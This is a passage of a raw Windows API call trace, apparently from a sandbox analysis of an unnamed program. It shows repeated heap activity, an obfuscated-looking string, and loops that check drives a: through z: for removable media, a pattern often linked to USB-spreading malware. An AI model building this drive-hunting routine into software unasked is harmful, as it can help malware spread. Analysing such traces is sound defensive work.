out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.946] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.946] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.946] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.946] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.946] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.946] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0213.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.947] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0213.947] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.947] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.947] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.947] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.947] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.947] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.947] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.948] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.948] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.948] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.948] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.948] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.948] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.949] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.949] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.949] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.949] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.949] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.950] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.951] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.951] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.951] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0213.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0213.952] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0213.952] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.952] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0213.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.952] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0213.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.952] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.953] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.953] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0213.953] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.953] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.953] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.953] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.954] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.954] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.954] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.954] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.954] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.954] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.955] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.956] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.956] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.956] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.956] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.956] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.957] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.957] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.957] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.957] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.957] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.957] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.958] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0213.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.958] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.958] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0213.958] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0213.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.975] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.976] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.976] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.976] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.976] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0213.976] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.977] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0213.977] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.978] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.978] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.978] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.978] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.978] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.978] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.979] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.979] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.979] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.979] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.979] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.979] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.980] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.980] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.980] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.980] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.980] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.981] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.981] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.981] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.981] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.981] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.981] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.982] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.982] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.982] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.982] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0213.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.982] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.982] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.983] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0213.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0213.983] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.983] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.984] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) 